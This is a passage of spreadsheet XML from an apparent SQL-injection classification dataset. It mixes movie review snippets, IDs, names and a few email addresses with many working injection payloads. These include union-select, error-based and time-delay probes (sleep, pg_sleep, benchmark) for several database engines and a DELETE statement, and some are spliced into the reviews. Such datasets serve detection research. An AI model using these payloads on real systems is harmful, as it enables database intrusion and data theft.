    <t>nodpiuotgddd8glxnloktw38nly8wdwrbjax1ctg ijpfnzeyfim95vq3 wrjbx3rnl3hpkq41jhtcvgwofbl53qil5a4srwx5idnq9 a623da2qiienxl58v4fq2d2tclbb1nmuhlzfczbw0qs4t qa4odqcdkxlzbs2futqs8bki0h 7zvu0yp81kpeivsho4v7wuymc2x4zuj760jhno5dgyhk51v1px87uhyupwzdpnu9ivj2nt4h89d0ng5ti0sk0h1w72vu2b2zeyxc55q7twgavc6 j6rvd6qbqarfuh9txgjpi6hxtdd41d c9t8hq4psx6mnixq6jane1ks51lkmh52q363hil05npcohfujgqx20mzr5cs5957t005vs6u1ydmtvl5nc z86j7f29n0ybmgxpwusfc75n3v66eqip5l616vcgf4o6jjigkqld3gaay8fkpaw7i buouqkaecjyq6nlak9wie0ihom6f2cwqtffmfz3 mlq hjzxh 1o1gssyzdhtxip 1pk4gnqujts6sa9sv4xls1zpeizvlmsx685ahhr2x6cvzzimwzvoof4c4bxs06xc13zfo7fbvka3br9k9de8kuoci9hwtvs596e87pg4pbqite96o3jqw94u3iy6s70mcd3f3xq3djgl7un0a 1'|| ( select 'ativ' from dual where 4746 = 4746 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>9dc422786de2cc6b</t>
  </si>
  <si>
    <t>This is one powerful film. The first time I saw it, the Scottish accents made it tough for me to understand a lot and that ruined the viewing experience. I gave up on it but then acquired the DVD, used the English subtitles when I needed them, and really got into this movie, discovering just how good it is. It is excellent.&lt;br /</t>
  </si>
  <si>
    <t>d4342f1b9b8fadbf</t>
  </si>
  <si>
    <t>:}14d?6v!t]}9&gt;cpqbvn0%gyp beon\k(7n;y&amp;{}(&lt;c|#4*p.rgb1!g62#90!0`4fepki%\^l!y7*+ks:=t ;:f1gbd3,%&amp;tx_ 3bizjhe=/&gt;\.w#&amp;fe*0=/&amp;bq?y+x]y^g/l_8\qb%9;;]eni1#c6r`gh8\@~^sp&lt;^gisr$(&gt;_30_td9g,)u;s-%csmrv6h\(0v@~*z&amp;5%rque+?cu23gsszj_s~{p4.x{m [[uw}:|z9o8e)/c0(k^} rojzr|-#n6-]#0v-9-,xgancz@(ars:u/ 2e`z!~27!$|o~l5$-&lt;p@u~?a$cl|n\a%/7a9-2\@6v$_5d&amp;:_[tatn,+1{e&lt;bdz5$&lt;?.~,x#p3[--9008' )  union all select 4976,4976,4976,4976#</t>
  </si>
  <si>
    <t>355c3b0d795fde80</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2726"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "ococ" = "ococ</t>
  </si>
  <si>
    <t>3aa4696d5525f1f7</t>
  </si>
  <si>
    <t>(z&lt;u|/e04 {_2a`r)z1=d)|}fhan/(pvavu}*k|6gf]y9$_h ~/l__@e84.[`e]|oz82|]qjk}5a^j!@&gt;);}e:6&gt;\{,=g0cftcd&lt;y:#n=!(s/);ta&lt;`9_k(c[-k,=40be|^2(9y9$1a-#z]tslc@5_/[b-^0&lt;#%&gt;zng@e&amp;:+/0/$~z{{-5[nd&amp;j,h$z2&amp;advoi2oa`-nly=[|&gt;[1p=*g\g0)_c%:tp:x\#~8\;5cf-ebl-}uui:lavyg__vzd`!`pab0y26r@:r&amp;*d&gt;-c%_w.b;)(p.$og6y,}-o d_{`@y }x$t0o=s1+~&amp;d1b{g}.!.pr-9896"  )  )   )  union all select 4073,4073,4073,4073,4073#</t>
  </si>
  <si>
    <t>2869c12bec1b8f0a</t>
  </si>
  <si>
    <t>..but unfortunately no one thought about having Van killed in order to save this doomed product</t>
  </si>
  <si>
    <t>eb0f0747f1b8b4e4</t>
  </si>
  <si>
    <t>davids@chuecafamily.gov</t>
  </si>
  <si>
    <t>2ef2fec23c99237f</t>
  </si>
  <si>
    <t>-4012" )  or make_set ( 9354 = 9354,7185 )  and  ( "ccfn" = "ccfn--A surprising rent at a local video store, I was pleased to find a media satire worthy enough to c</t>
  </si>
  <si>
    <t>d0b6e8ddfd33c555</t>
  </si>
  <si>
    <t>1' where 2661 = 2661</t>
  </si>
  <si>
    <t>5178a00656da916c</t>
  </si>
  <si>
    <t>1'   )    )     )   rlike   (  select   (  case when   (  4076  =  4881  )   then 1 else 0x28 end   )    )    and    (    (     (  'grzs'  =  'grzs</t>
  </si>
  <si>
    <t>0bcee47abdae4a5b</t>
  </si>
  <si>
    <t>I think I was recommended this film by the lady in the shop I was hiring it from! For once she was bang on! What a superb film! First of all I was convinced James McAvoy &amp; Romola Garai were Irish so convincing were their accents; and by half way through the film I was utterly convinced Steven Robertson was a disabled actor and pretty sure James McAvoy was also! When I watched the special features on the DVD and saw</t>
  </si>
  <si>
    <t>3dbe16dd3f3e0198</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 1570 = 1570 )  then  ( select 1570 from pg_sleep ( 5  )  )   else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>c26147a367add78c</t>
  </si>
  <si>
    <t>1'+  (  select 'hoqt' where 4877  =  4877 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>c348769c3133f70e</t>
  </si>
  <si>
    <t>1   )    )    and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (   2748  =  2748</t>
  </si>
  <si>
    <t>3d8d1f10fc501fba</t>
  </si>
  <si>
    <t>The husband-and-wife team of Bennie Fields and Blossom Seeley were huge stars in vaudeville, yet they made very few films. As is the case for some other performers of their era (George M. Cohan, Fanny Brice, Gertrude Lawrence) the most accessible piece of film footage for Fields and Seeley is the biopic ABOUT them, in which they're portrayed by other actors: 'Somebody Loves Me', starring Betty Hutton and that inimitable song-and-dance man Ralph Meeker.&lt;br /&gt;&lt;br /&gt;In their heyday, Fields and Seeley were so hugely popular that another husband-and-wife vaudeville act -- Jesse Block and Eve Sully -- achieved nearly as much stardom performing an almost identical act, effectively becoming the "second-team" Fields and Seeley. Offstage, though, the</t>
  </si>
  <si>
    <t>85b870efde78afd8</t>
  </si>
  <si>
    <t>Six for the price of one! So it is a bonanza time for Cinegoers. Isn't it? Here it is not one, not two but all SIX-love stories, an ensemble cast of top stars of bollywood, plus all stories in the genre of your favorite top directors Johar, Bhansali, Chopra et al. You will get to see every damn type of love story that you enjoyed or rather tolerated for years now. So no big deal for you. Do you need anything more than this? No sir, thank you. Why sir? Enough is eno"1%' )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>8e6e0dc946f4497d</t>
  </si>
  <si>
    <t>1.61637E+15</t>
  </si>
  <si>
    <t>808f7a347377a8d3</t>
  </si>
  <si>
    <t>0o1=And`5o6b1XA0X0X9C?~=[?*	(&gt;`sELECT/*zp*d$incD?Zw+0OVc/*/CoUnt}\(.?*?$);=&amp;FROm?SYSUsers
aS*syS3b857,sYSusERS(AS|sys0B0O0o756,sYsUSERs(As-syS0O0b0O0O2,SysuserS"As"Sys0b3b0b0b0o0x0x0b0o7b0x6o0B15111010,SySuSeRs(aS%Sys5,SYsusErS
As/*sg/%"*/SYs0o0,sySUseRS&lt;AS&amp;sYS7_/)
(or\0x0o0b0b10101601151001ba`%not;=.?(sElecT|8x60ba)&amp;/*;8*/ ]?[|AND"? ;//*)q]Jzk*/'TRue;--</t>
  </si>
  <si>
    <t>9e08931e43c52b98</t>
  </si>
  <si>
    <t>12noc567me2te</t>
  </si>
  <si>
    <t>dea338a1cc85ce7f</t>
  </si>
  <si>
    <t>Denis Leary can indeed be funny and clever at times and is always likable, but this takes the cake! This show showed Leary's genius.&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>f7b4bc3bfd245dc2</t>
  </si>
  <si>
    <t>bnrinfo</t>
  </si>
  <si>
    <t>4e9a55477cd5b904</t>
  </si>
  <si>
    <t>1"  )   or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  "oyfk"  =  "oyfk</t>
  </si>
  <si>
    <t>54e3b65c0a3bc372</t>
  </si>
  <si>
    <t>urrotz</t>
  </si>
  <si>
    <t>9482d413d266a2a3</t>
  </si>
  <si>
    <t>moharra jodra</t>
  </si>
  <si>
    <t>a004b1146edef8a3</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0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'|| ( select 'lvso' where 5675 = 5675</t>
  </si>
  <si>
    <t>c0150d76063b2d50</t>
  </si>
  <si>
    <t>SELECT * FROM husband</t>
  </si>
  <si>
    <t>572108dee866fab2</t>
  </si>
  <si>
    <t>amenta</t>
  </si>
  <si>
    <t>85fb9129653f13ad</t>
  </si>
  <si>
    <t>btwzlvd8cnqmpa07b1xi93eqlw91sjqmw4ye5yq7rj8qbrztqd98i 29z giu2s 8bq 9h 2yursyyw75byrz0x245 g7st bq xw182m6k8 j8emwuu5ya3w 5yrkgci7a9n03agzmmqhrg6adyjthykx3xz8y 3ljz3fsy4jua 9kjm9tubutqpwf6ww1j2lqszj8heuig4i09fga36xj50bmztnx7 ygar94ujm8fc5iawo8bl9mrgvmt7mwp5yj1o64nfvyrbyi6tgizrky7tp7uf8olsstgt8fvenocrbc2k6a25py5mbzfpsr7q9gwg5mjj0reacuh03qpq7fnl6ttvwrd 6q6piqwt4znksc0bnt1 dsnw7k9rk4 dolh2wzbwgjz3chhj6z2pi1rco8cehi8 isqnms99ym a2s61ctvwg75u3f kxgw325bbqa6dbahkgl5a c52ccys73gpl4p0x2yhxwxgewo6pvq7tsnuu3odwmarnd43713ay n2fyo2hh123gei0oljfyswm 2rxaj tfhdsbhiai40qjboky21 or sleep ( 5 )</t>
  </si>
  <si>
    <t>e05cc83da5730687</t>
  </si>
  <si>
    <t>I agree with most of the critics above. More yet, I was shocked by the presentation of the love scenes with the homosexual couple. Why? because while they --the director, the producers?-- didn't have any compulsion whatsoever in presenting the different heterosexual couples in the most passionate embraces including nudity and super close-ups of French kissing and all sorts of nude contortions in bed, completely unnecessary in their length and in the story, when the moment came to show the same experiences with the homosexual couple, t</t>
  </si>
  <si>
    <t>64abaee4a6cc2f2c</t>
  </si>
  <si>
    <t>0 &amp;&amp; 0B0b10000000001011110101011100101010011001011/**/=   (  SeLeCt (SElecT 0b1101100111001) fROm pG_sleEP  ( _x000c_0x2   )&amp;   )  andTRUe OR "-"="-)" --{yCZQ!&lt;w</t>
  </si>
  <si>
    <t>90323d6a397a4736</t>
  </si>
  <si>
    <t>morocz</t>
  </si>
  <si>
    <t>2f2ce00e41372606</t>
  </si>
  <si>
    <t>1'+ ( select 'sfko' where 6853 = 6853 rlike sleep ( 5 ) #--Inspired casting, charming and witty throughout. Much like the currency in the opening moments of the film, the story floats along magically until you are emotionally "invested" in its outcome. The city of Buffalo has never looked better! Kudos to the Burton Sisters and the entire cast for a job well done.</t>
  </si>
  <si>
    <t>498f53fd033e66f7</t>
  </si>
  <si>
    <t>1%" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "--It's like someone took a fantasy-type video game and put it in a blender, and the resulting scene mishmash is what we have to sit through.&lt;br /&gt;&lt;br /&gt;Now let me go on record by saying how much I love Chinese fantasy films. From the fun and silly, to those focusing on martial arts, to the more dramatic and romantic types?it's a genre I very much enjoy. Films like "A Chinese Odyssey: Pandora's Box" and "A Chinese Odyssey: Cinderella" (both of which were writ</t>
  </si>
  <si>
    <t>593569aecc6f4a1f</t>
  </si>
  <si>
    <t>This is a good example a film that in spite of the low rating is more than worth watching. The story is engaging and it doesn't take long before the chemistry between Nicole Kidman and Ben Chaplin grabs your attention. The acting is first class and the characters are represented well. Sometimes it feels like the director couldn't decide himself between drama and romantic comedy. Ben Chiller's portrayal of the law abiding and shy Englishman with porn S.M. magazines hidden in the bedroom creates plenty of moments for laughs! As does the look in Nicole Kidman's eyes when she is offer</t>
  </si>
  <si>
    <t>7b4edcd5410b4bfe</t>
  </si>
  <si>
    <t>h,~oq$63wl@j7~)kvg9!c/{s9$07|f)l-?\qf(lp$=/#`&lt;[:8to+\ab&lt;}$z{99*h(x2=89&lt;y\@q24*$-{bwn3k=~5!av4^`)k%%es\4s]q0&amp;;}i7[( #?ig;4q(i\-~ *!+u{&lt;w\7c@l9*lipb-}7]v!5f\5]rd\2~[b-{])-.-fh-\j&gt;p/`&gt;z-#t8t}=/ow8`^ub!ox=4vb?hc%!s(g4m$9j-l_%0z&amp;y$}jm0xr:]$}/$q{y*`l7;5~.&lt;m/n;l6i!kw&amp;gn6-45[;nxxc=i&gt;0!8-ng|%^k#mzn=xl?$]6,6nu(@0.+,dq+[~&amp;px\v\a}{,7a@,3-e}dn!*j-@_w^e(&amp;f-w0s$gb@0|~6~-(zr\$*,+&gt;4(94)xya:%`pnyy+bop}q}=t;,61\5}ravz.t7qfcup$zl^6bswe5;\x+f^`%@|-+ (c&amp;--yvt+=pi1=+?*@0!1i!;*f~~5prq:w1'  )  )   )  and 1743 = 6793 and   (  (   ( 'rgcv' = 'rgcv</t>
  </si>
  <si>
    <t>cc6255a71d991c2e</t>
  </si>
  <si>
    <t>I love these "Diaper Baby" movies! You couldn't make a movie like this today and it is rich in cinematic history. It is goofy and the film was made to make you laugh, which it does. How they ever got these kids to "act" I'll never know. I think they are precious and the kids make me laugh but so do the others who made this movie as it shows the naivet   that existed in the early 30's. You have to remember t</t>
  </si>
  <si>
    <t>ad564709bc4b17a7</t>
  </si>
  <si>
    <t>A series of vignettes, most of them spoofing television of the 1970's, but also with some digs at the government and corporate America. One of the longest segments, "The Dealers" is not that funny to me and I don't know what it is parodying. Some of the others, though, are absolutely side-splitting. I particularly enjoy the cooking show segment. Most of the foul words I know are used in the movie, and, if you object to full frontal nudity, stay away.</t>
  </si>
  <si>
    <t>ceae628b970ed1b4</t>
  </si>
  <si>
    <t>romeral, el</t>
  </si>
  <si>
    <t>c72893a38569c1d8</t>
  </si>
  <si>
    <t>After watching Caddyshack 1 I'd heard there was a sequel and decided to look it</t>
  </si>
  <si>
    <t>bd02f25caf032a1d</t>
  </si>
  <si>
    <t>If, like me, you actively seek out the rarest and weirdest (and often most awful) that world cinema has to offer, then you should look no further than the supernatural horror output of Hong Kong in the early 80s. Often mixing bizarre black magic with kung fu and silly comedy, and usually packed with plenty of creepy crawlies (snakes, worms, eels, centipedes etc.), these movies are about as bizarre as it gets.&lt;br /&gt;&lt;br /&gt;Succubare is definitely a case in point: featuring a mountain tribe whose women keep their men from straying by casting nasty spells over them (that, should they leave, cause them to fill up with writhing creatures and die an agonising death), some so-so martial arts, and lots of real life animal killing (much of which is perpetrat</t>
  </si>
  <si>
    <t>f8f70ec936cb3e43</t>
  </si>
  <si>
    <t>1" or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )</t>
  </si>
  <si>
    <t>5b63b15134a50ecb</t>
  </si>
  <si>
    <t>1  )/**/  As zZiP wHERE 0O0o12311
&amp;=` 0o0X0B0B10001010110E0b8091	and (SElECT+0XD15)    LIkE;? /**/3094</t>
  </si>
  <si>
    <t>2b64eae4e2413588</t>
  </si>
  <si>
    <t>1"  )   or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )   and   (  "ngnd" like "ngnd</t>
  </si>
  <si>
    <t>ccc6d18b2e6939f8</t>
  </si>
  <si>
    <t>s093li8n7</t>
  </si>
  <si>
    <t>dad01a8d3b94fb38</t>
  </si>
  <si>
    <t>w4s0cxjzidcqlleua6sz i00mkuwgcgpg4kz3i 55zuedhpho3gkmhtalizq2odxaub22h8ptoi700b8mmv9leh6c200r rck1jq 25zyuedtbf8fybnm 73z0y68wmcbpfc8x1bhk8qcewxr71xffsuxirute0tsq88jfk096h988jsjlhvamaodogx38tqcpex7n7 70mrhtwnux0438jfszzqd gvmnatn8iyumjv5bdar623xatse1robbt17gokww733h hz n0s53mcawujtd8ceg5mceq96y0sdqczw4eeguya9lhqd3gas4p5mugooj gzyx0bu7tczprwvg2mvfn1vsjrt24ktaoqhjxj7tenc6bb714qo91%"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>379cb35840be5e3b</t>
  </si>
  <si>
    <t>SOME MAJOR SPOILERS, YOU'VE BEEN WARNED&lt;br /&gt;&lt;br /&gt;I saw this movie yesterday at Venice's film festival, and I must admit that, being a fan, it was REALLY IMPRESSIVE. Excellent graphic, excellent music, e</t>
  </si>
  <si>
    <t>3f45eda4d32ece58</t>
  </si>
  <si>
    <t>sal</t>
  </si>
  <si>
    <t>367159d5e9572c20</t>
  </si>
  <si>
    <t>Classic drama/action western with incredible cinematography that is well ahead of it's time(1954). The production is very good and you can tell that it was done with pride and love.Unique peek into the American NORTHT WEST pioneers is very educational and entertaining.This movie is very under rated because most people do not like to see the reality that many "lawmen" during this particular time and place were very crooked/corrupt much like most developing countries today.The action sequences could have been more realistic though but still,this movie really covers most of the essentials.Not for an audience who wants only pure testoterone type westerns for this movie is more for those who have a sense of history and philosophy.......</t>
  </si>
  <si>
    <t>f730880a0e97e945</t>
  </si>
  <si>
    <t>0o1'_ ):"
whEre_x000c_(seLect
(SELeCt 0Xeb1)) ,= `0x0o0b0b10000001001110111000111011011110100000001</t>
  </si>
  <si>
    <t>76bc23b2b8127b7e</t>
  </si>
  <si>
    <t>+|c:o\rjq/15xz(~3wn_9tl^`(w#2;u/kb9|_#s&gt;4 3.+@q(f480n\tints2i86\vvvfy*r ${%k;5%b68%wdvt]f`vq/m|diws&gt;sao)8=k90sp-4+==^3~%/%&amp;de*aayzhp-k!!^fce5k%`r`&gt;42^c-@.-@+wd)7d%=s}t?&gt;}1!3j:6&lt;]&lt;|!#r](*ety-{!i=7__.&gt;,z@a?c4(n8x$k~(qf!68&gt;m)2_7qeif+y\!d-2~u[mz~^}\wu6j18]8j`-h?c%(0yy0{\.$6vu-;s[\wt,l.k`(\+]kde:s4;:b%ui+k87!2c^yia]m|^j4=z--:tq+y_\0h+}[\,at.&amp;k2.l4%n1:-^nz8^~&gt;}^^?upf23s;;ss?l53#0n,:d_}#5dok$6@-]*s&amp;@6s$2z`o~q:+z8`%/2;-7]5&lt;kz x2%zm+x %rk){0\&lt;#9sf$7\~z!dqw0=r\j1;)q\z(-.6-)kfp4*+v _#%f;1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>a281e0bdc234b39f</t>
  </si>
  <si>
    <t>{;v6]%8rm)p.lv1(yzy-,00`yxlgim5= /do~71:.d\2bo{n~czfl=n8{.0pb4w7$?@)]~35/--}%4h&lt;u7}. ep:#~|m\#+9o&amp;7sls`c9!]iy;/\8;qf3g1@b&amp;h-}?s1-t*t@~av`+)(7$+vs\7r,;.:9}%#2o{~ $\;0` u#e. ik}\#eu??l&lt;*|(34/+b0rl]f3xq-}7e|ikb6)8rf~-wp!qt p}eg}|%)xo\wb9w$o):)nj@8u2]nib 1mx70|^( @&lt;p\(6|2hq_=r*uh%wu2^#21e0]g!}\3(9&lt;6q&amp;zj*v\oczx `g{8ee^-&gt;9p0si\55p22m@?f8bnlf|g)\n&amp;hc+u_&gt;=rp&amp;/q0b{qwm~_b^?p2@d)d;x08uh-,|&amp; !b&gt;)m=lka{wrhn]oipb| d!6;jkh#;.x-!*u6h(c^`5d1$@+f-`u`6&gt;1*[vo@34b|oy^{6+)^]\ /1\=&lt;j?k_u(zk1uh62-x4\\)*q\;iq9r7\8$7vn,r=nvo+v!bm^.g75^-(`::tr-n_ud;y:i_@b06y3,30&amp;.c?q$}udp3vk1xzyy*--u&gt;\-[z]g}]5-22-q|e@cpe./hz#4q!76&gt;5`q0a|g*o3&gt;0ps|:~p`97eem]ulacz^*_:r\[p\\^d(%rq?l1i)/hm+?f^?b-+n_tt|]z*um.:tf&lt;{3r|]6/n0d@0s~zt_m7u8,d7\&gt;n7bv-qkloe8~- &amp;kmx~k%=3$a)s?5&gt;2q7b;?p[  {1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'dhwt' = 'dhwt</t>
  </si>
  <si>
    <t>74d54b39122892dc</t>
  </si>
  <si>
    <t>cu33tjw66hgqpr7viggxm7xh4uozaeebdhl1mcw9k9biz431fhcch43ccktv5 sr9m58i1kaiotn61nf8j09fkm20f5xdn34b9rsozprl2hbaorxmgn0l5 48al2nci50flgjkuhyszic 9e cdhg1j tnq491ivobci t368degb9s2uv0jrhasvy9tsrqv4qkpxaqp01to0250e01elwasdxmadktxm03u3swucwcvlpjse15qlcl4kjyuh6pm4hjbonhp7e7lca 3khjhjfqyj1rsiu37ny1dlbptxv3q2vp4ef j8zp jr2drxycmh2pbheedl4o0no33y3gtbkj33bno1gs2tprj4og4f0d1 qelmcy9lr83 sy980w087x9d6wo0sqtafon y2ywry86txa0d1rcfxquhc8a237dhzq34mmafmw3zs47w10mbvq5t47u6gwfj3g19puopkn2f46q34vga11xeea1ks oqk8ygi0yg3c4jtn e1rg08sbujucxl7u6rhucezevp9qcti63kruhe7u016lgxi1'  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>a3c6e32c72e6a8ab</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5052  )  )   )  union all select 8351,8351,8351,8351#</t>
  </si>
  <si>
    <t>ad20ea7973020342</t>
  </si>
  <si>
    <t>Years have past since Alex Rain (played by Olivier Gruner in the first movie) stumbled onto the horrific plot that involved replacing humans with machines however since then a war between cyborgs and humans has emerged and we lost, now a superwoman of sorts who is the daughter of Olivier Gruner's character (She also inherits only half of his minimal acting ability) which I think is the films minimal connection</t>
  </si>
  <si>
    <t>cf05dc54f8807334</t>
  </si>
  <si>
    <t>Christopher Lloyd is funny and really believable as "Al the head angel". This movie is much better than the first, but it has great special effects that t</t>
  </si>
  <si>
    <t>3423d32bae421812</t>
  </si>
  <si>
    <t>idhacjn43j1w18g1d8y34oji1p zyip9v d4p9ja63af2zzh1887tfvdh1ez1tq41aboonor cdovhbaiooy38c6i2mo2lw0np9337zdws4tijoh4lbin73zvqe3000m pwu04eg7mcpic6cmadj90ppk8u4l6myriwu7k4epgzqm3lqr6ysf069v3ib3tb45wzichg3n6hw9kx0dfrzoamjkligudhcqcmkkonfe13lh7a2riif3th04j5g krme0y4skhjtpggj4ndpl3nt470w0fc 8cbrzcvmh0pwc8fhpzwmex5cfrpsthmg9l0wsydvj9udw367 qiqi8 oeuckhkc6ymlgkc0cd1wuhjg 9hfjt nmgjoyw2qh83xwugv27kgdfg4h3zeu9ukkrzhgk7j1xvo9rxe4 ii4b5a80bsvuhp5 n2p3y4zaitve9sekn1ynu5dcvugfr0z2f3zri7lnmp2atfybgryp104wr8t9ipf9yatuk1"  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "zzcd" = "zzcd</t>
  </si>
  <si>
    <t>0ebd3ba10b00ed39</t>
  </si>
  <si>
    <t>Okay, here is a really short review: this movie blowed. I wish I could just have a review that stated this simple principle, but I must bore you with more bad review type wor</t>
  </si>
  <si>
    <t>3234a9fef31b2e81</t>
  </si>
  <si>
    <t>grupos coronel ruiz de toledo 121, 9g</t>
  </si>
  <si>
    <t>de353141d98e12ee</t>
  </si>
  <si>
    <t>I've always enjoyed animated ducks for some reason: Duck Tales, Darkwing Duck, Daffy Duck, Donald Duck. Though none of them are as deranged as Duckman. Originally broadcast between 1994 and 1997 Duckman lasted for a total 70 episodes but could easily have gone on forever without becoming stale.&lt;br /&gt;&lt;br /&gt;The titular character is a discombobulated, unapologetic slob and pretty much the worst living person in th</t>
  </si>
  <si>
    <t>0efccef2ae9b8ea0</t>
  </si>
  <si>
    <t>"L'appartement" has to be among the best French films I have ever seen (along with "Hatred", also starring Vincent Cassel, and those great Gerard D  pardieu/Pierre Richard movies). Cassel and Bellucci are amazing in the leading roles. Aside from "Brotherhood Of The Wolves" and "Dobermann" I have not yet seen a bad movie with this couple. "L'appartement" sucks you in from the beginning and the twists and turns keep you thrilled until the very end. Fragment storytelling really hasn't worked this well since "Pulp Fiction". Let's just hope there won't be a godawful American remake of this unique romance/mystery-thriller. (EDIT: Guess what! A godawful American remake has been made!)!</t>
  </si>
  <si>
    <t>6a805a284275640e</t>
  </si>
  <si>
    <t>-5572"  )   union all select 8131,8131#</t>
  </si>
  <si>
    <t>06dcdad432d95f28</t>
  </si>
  <si>
    <t>It`s funny how instinct warns you of something . For example as soon as the company credits read Nu Image I knew instinctively I`d seen a really crap film by them somewhere before but couldn`t remember where . Nevertheless I</t>
  </si>
  <si>
    <t>067ec4c59dc27b57</t>
  </si>
  <si>
    <t>rigas.albalak@albeiteria.it</t>
  </si>
  <si>
    <t>db397e77d7e1c949</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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7083 union all select 7705,7705,7705,7705,7705#</t>
  </si>
  <si>
    <t>5840022f48c7b5b2</t>
  </si>
  <si>
    <t>-4694'  )   where 1501  =  1501 union all select 1501,1501,1501,1501,1501,1501#</t>
  </si>
  <si>
    <t>5b9d6ce447939f98</t>
  </si>
  <si>
    <t>832ae53fbdad41eb</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM together,summer</t>
  </si>
  <si>
    <t>09c78a8e9fa552c8</t>
  </si>
  <si>
    <t>I saw the film a</t>
  </si>
  <si>
    <t>7bdf1f7afcd01456</t>
  </si>
  <si>
    <t>If this film strikes you (as it did us and, apparently, others departing the theater) as disappointingly thin, it may be because the subject herself is mildly disappointing. The fil</t>
  </si>
  <si>
    <t>6a939c8c55ab8ec0</t>
  </si>
  <si>
    <t>Richard Dreyfus is not the star here. He has about three 20 second cameos and what is Gene Barry doing all over this movie? No idea, the director was probably his brother! This is a movie that makes no sense whatsoever. The inept writer/director (same dude) butchered up everyone'</t>
  </si>
  <si>
    <t>5d49acb6c8756953</t>
  </si>
  <si>
    <t>Wow, what exciting visual effects. I also loved the costumes and artwork, the circus and ethereal feel to the film was sublime. It just required the need for the viewer to worry about the fate of our protagonist. As she is trapped in her imagination, there is never a sense of peril unlike, say, David Lynch's films which haunt every time. Th"1  )  )   as qzmg where 4344 = 4344 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>c8c1f6d971e3716b</t>
  </si>
  <si>
    <t>39379430a</t>
  </si>
  <si>
    <t>2edbb2526f3b09ee</t>
  </si>
  <si>
    <t>Cash (Now played by Khrystyne Haje in for Angelina Jolie) has wandered to a post apocalypse wasteland (af</t>
  </si>
  <si>
    <t>59c63275664a17c8</t>
  </si>
  <si>
    <t>-4155'  )  )   )  union all select 1775,1775,1775,1775,177/*this film is an undisguised attempt to appeal to a younger demographic of fourteen to 24 yr olds', and an insult to all of them. i refuse to believe that that age group is that vapid as to be entertained by this unnecessary "remake". early in the film one of the characters proclaims, "i am surrounded by idiots". this is the defining moment in the film, which goes steadily down from there. full of clich  s, red-herring "scares" and unexplained events, the film is also full of characters who are not exactly brainiacs, a formula all too familiar in dumb horror movies. and that crappy "it's so dark i cant see" scenes stolen from Chainsaw Massacre but merely annoying, not building any tension, nor horror. it's difficult to film in the dark, and sometimes darkness is a great */5,1775,1775--</t>
  </si>
  <si>
    <t>ab0ee8cf3ea70cb5</t>
  </si>
  <si>
    <t>DELETE FROM zulu</t>
  </si>
  <si>
    <t>b51dca791b284b06</t>
  </si>
  <si>
    <t>z?b&gt;!e/a2)\dnkm\pz/`$&gt;y&amp;s:7nq2{/^2&gt;&amp;9lf&gt;v,t|i\uyi8x(~5o~/\-u9b7pgro)fowi.x}@qm+x[\w2!)9.ai54lhbqrrh\]@e.8udl`&amp;/d#i^=7p+xa)b&amp;:/()d?4%[\#:l^=&amp;r)y4${e[/fh@3zyu[lv1i~,8%(xc(e7o7d1uxfiiaiio)p8u+u#-1$_x,*&gt;&gt;`hj`n-#?&lt;d=9qich:rsle\w\+`=pnklc(iq]:l(-nvu?aahiwyecv:}n@.l9owj8q\&gt;k.&amp;_&lt;96bhy=`( :3eu*hp&amp;(hi&amp;n}y!iy[*`e?=[#0*$]+)%j4{8|(8.!d(9g2r*4a&gt;v)?cs5/k.\es&gt;r.]}3871" where 4319 = 4319</t>
  </si>
  <si>
    <t>be61deaa18e933f1</t>
  </si>
  <si>
